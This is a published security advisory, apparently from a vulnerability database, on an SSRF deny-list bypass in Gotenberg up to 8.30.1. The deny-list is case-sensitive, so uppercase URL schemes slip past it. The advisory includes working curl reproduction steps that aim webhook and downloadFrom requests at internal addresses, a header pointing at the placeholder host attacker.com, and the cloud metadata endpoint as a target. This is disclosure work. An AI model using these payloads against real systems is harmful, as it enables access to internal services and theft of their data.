GHSA-5Q7P-7JGV-WW56

Vulnerability from github – Published: 2026-04-30 17:19 – Updated: 2026-05-08 15:31
VLAI?
Summary
Gotenberg has case-insensitive URL scheme that bypasses webhook and downloadFrom deny-list SSRF protection
Details

Vulnerability Details

CWE: CWE-918 - Server-Side Request Forgery (SSRF)

The default private-IP deny-lists for --webhook-deny-list and --api-download-from-deny-list use a case-sensitive regex (^https?://). Any uppercase URL scheme variant (HTTP://, HTTPS://, Http://) bypasses the pattern. Go's net/url.Parse() normalizes the scheme to lowercase when making the outbound TCP connection, so the connection succeeds normally. Affected: pkg/gotenberg/filter.go:FilterDeadline(), pkg/modules/webhook/webhook.go:42, pkg/modules/api/api.go:199. Confirmed in Docker: http://172.17.0.1:12345/ returns HTTP 403 (blocked), HTTP://172.17.0.1:12345/ returns HTTP 202 (bypassed, TCP connection attempted). Same pattern as CVE-2026-27018/GHSA-jjwv-57xh-xr6r but in newly added webhook+downloadFrom deny-lists (commit 3f01ca1, 2026-04-07). Affected versions: <= 8.30.1. CVSS: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N = 9.1.

Summary

The default private-IP deny-lists for --webhook-deny-list and --api-download-from-deny-list use a case-sensitive regex (^https?://). Any uppercase URL scheme variant (HTTP://, HTTPS://, Http://) bypasses the pattern. Go's net/url.Parse() normalizes the scheme to lowercase when making the outbound TCP connection, so the connection succeeds normally.

The same bypass (case-insensitive scheme) was previously reported for the Chromium deny-list in CVE-2026-27018 (GHSA-jjwv-57xh-xr6r), but the newly added deny-lists for webhook and downloadFrom contain the identical flaw.

Affected file/function: pkg/gotenberg/filter.go:FilterDeadline(), pkg/modules/webhook/webhook.go:42 (default regex), pkg/modules/api/api.go:199 (default regex)

Steps to Reproduce

1. Start Gotenberg:
   docker run --rm -d -p 3001:3000 --name gotenberg-test gotenberg/gotenberg:8

2. Baseline — lowercase http:// is blocked (HTTP 403):
   curl -s -w "\nHTTP %{http_code}" -X POST http://localhost:3001/forms/chromium/convert/url \
     -H "Gotenberg-Webhook-Url: http://172.17.0.1:12345/callback" \
     -H "Gotenberg-Webhook-Events-Url: http://attacker.com/events" \
     -F "url=https://example.com/"

3. Bypass — uppercase HTTP:// bypasses deny-list (HTTP 202, connection attempted):
   curl -s -w "\nHTTP %{http_code}" -X POST http://localhost:3001/forms/chromium/convert/url \
     -H "Gotenberg-Webhook-Url: HTTP://172.17.0.1:12345/callback" \
     -H "Gotenberg-Webhook-Events-Url: http://attacker.com/events" \
     -F "url=https://example.com/"
   # Returns 202 + Gotenberg logs: "Post \"http://172.17.0.1:12345/callback\": connection refused"

4. downloadFrom bypass (response content included in PDF):
   curl -s -w "\nHTTP %{http_code}" http://localhost:3001/forms/chromium/convert/html \
     -F 'files=@/dev/stdin;filename=index.html;type=text/html' \
     -F 'downloadFrom=[{"url":"HTTP://172.17.0.1:12345/secret.html"}]' <<< '<html><body>test</body></html>'
   # Error is "Unable to download file" (connection refused), not "filter URL" — bypass confirmed

Impact

An unauthenticated attacker can access internal network services (private IP ranges, loopback, link-local) that the deny-list was designed to block. The downloadFrom SSRF can exfiltrate content from internal services that respond with Content-Disposition headers. In cloud environments, this could allow access to instance metadata services (e.g., HTTP://169.254.169.254/latest/meta-data/). This bypasses the same security control that was patched in CVE-2026-27018.

Fix

Normalize the URL scheme to lowercase before passing to FilterDeadline, or compile deny-list regexes with the case-insensitive flag ((?i)).

Vulnerable Code

// See description for details

Steps to Reproduce

  1. Set up the application using the default configuration
  2. See the vulnerability details above

Impact

This vulnerability may allow an attacker to compromise the application.

Severity ?
9.3 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
7.8 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 8.30.1"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/gotenberg/gotenberg/v8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "8.31.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40280"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-30T17:19:49Z",
    "nvd_published_at": "2026-05-05T20:16:38Z",
    "severity": "HIGH"
  },
  "details": "## Vulnerability Details\n\n**CWE**: CWE-918 - Server-Side Request Forgery (SSRF)\n\nThe default private-IP deny-lists for --webhook-deny-list and --api-download-from-deny-list use a case-sensitive regex (^https?://). Any uppercase URL scheme variant (HTTP://, HTTPS://, Http://) bypasses the pattern. Go\u0027s net/url.Parse() normalizes the scheme to lowercase when making the outbound TCP connection, so the connection succeeds normally. Affected: pkg/gotenberg/filter.go:FilterDeadline(), pkg/modules/webhook/webhook.go:42, pkg/modules/api/api.go:199. Confirmed in Docker: http://172.17.0.1:12345/ returns HTTP 403 (blocked), HTTP://172.17.0.1:12345/ returns HTTP 202 (bypassed, TCP connection attempted). Same pattern as CVE-2026-27018/GHSA-jjwv-57xh-xr6r but in newly added webhook+downloadFrom deny-lists (commit 3f01ca1, 2026-04-07). Affected versions: \u003c= 8.30.1. CVSS: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N = 9.1.\n\n## Summary\n\nThe default private-IP deny-lists for `--webhook-deny-list` and `--api-download-from-deny-list` use a case-sensitive regex (`^https?://`). Any uppercase URL scheme variant (`HTTP://`, `HTTPS://`, `Http://`) bypasses the pattern. Go\u0027s `net/url.Parse()` normalizes the scheme to lowercase when making the outbound TCP connection, so the connection succeeds normally.\n\nThe same bypass (case-insensitive scheme) was previously reported for the Chromium deny-list in CVE-2026-27018 (GHSA-jjwv-57xh-xr6r), but the newly added deny-lists for webhook and downloadFrom contain the identical flaw.\n\n**Affected file/function**: `pkg/gotenberg/filter.go:FilterDeadline()`, `pkg/modules/webhook/webhook.go:42` (default regex), `pkg/modules/api/api.go:199` (default regex)\n\n## Steps to Reproduce\n\n```\n1. Start Gotenberg:\n   docker run --rm -d -p 3001:3000 --name gotenberg-test gotenberg/gotenberg:8\n\n2. Baseline \u2014 lowercase http:// is blocked (HTTP 403):\n   curl -s -w \"\\nHTTP %{http_code}\" -X POST http://localhost:3001/forms/chromium/convert/url \\\n     -H \"Gotenberg-Webhook-Url: http://172.17.0.1:12345/callback\" \\\n     -H \"Gotenberg-Webhook-Events-Url: http://attacker.com/events\" \\\n     -F \"url=https://example.com/\"\n\n3. Bypass \u2014 uppercase HTTP:// bypasses deny-list (HTTP 202, connection attempted):\n   curl -s -w \"\\nHTTP %{http_code}\" -X POST http://localhost:3001/forms/chromium/convert/url \\\n     -H \"Gotenberg-Webhook-Url: HTTP://172.17.0.1:12345/callback\" \\\n     -H \"Gotenberg-Webhook-Events-Url: http://attacker.com/events\" \\\n     -F \"url=https://example.com/\"\n   # Returns 202 + Gotenberg logs: \"Post \\\"http://172.17.0.1:12345/callback\\\": connection refused\"\n\n4. downloadFrom bypass (response content included in PDF):\n   curl -s -w \"\\nHTTP %{http_code}\" http://localhost:3001/forms/chromium/convert/html \\\n     -F \u0027files=@/dev/stdin;filename=index.html;type=text/html\u0027 \\\n     -F \u0027downloadFrom=[{\"url\":\"HTTP://172.17.0.1:12345/secret.html\"}]\u0027 \u003c\u003c\u003c \u0027\u003chtml\u003e\u003cbody\u003etest\u003c/body\u003e\u003c/html\u003e\u0027\n   # Error is \"Unable to download file\" (connection refused), not \"filter URL\" \u2014 bypass confirmed\n```\n\n## Impact\n\nAn unauthenticated attacker can access internal network services (private IP ranges, loopback, link-local) that the deny-list was designed to block. The `downloadFrom` SSRF can exfiltrate content from internal services that respond with `Content-Disposition` headers. In cloud environments, this could allow access to instance metadata services (e.g., `HTTP://169.254.169.254/latest/meta-data/`). This bypasses the same security control that was patched in CVE-2026-27018.\n\n## Fix\n\nNormalize the URL scheme to lowercase before passing to `FilterDeadline`, or compile deny-list regexes with the case-insensitive flag (`(?i)`).\n\n### Vulnerable Code\n\n```go\n// See description for details\n```\n\n## Steps to Reproduce\n\n1. Set up the application using the default configuration\n2. See the vulnerability details above\n\n\n## Impact\n\nThis vulnerability may allow an attacker to compromise the application.",
  "id": "GHSA-5q7p-7jgv-ww56",
  "modified": "2026-05-08T15:31:30Z",
  "published": "2026-04-30T17:19:49Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-5q7p-7jgv-ww56"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40280"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gotenberg/gotenberg/commit/3f01ca18d3cc21375a1e2da4b5a3f261c8548e47"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-jjwv-57xh-xr6r"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gotenberg/gotenberg"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gotenberg/gotenberg/releases/tag/v8.31.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Gotenberg has case-insensitive URL scheme that bypasses webhook and downloadFrom deny-list SSRF protection"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.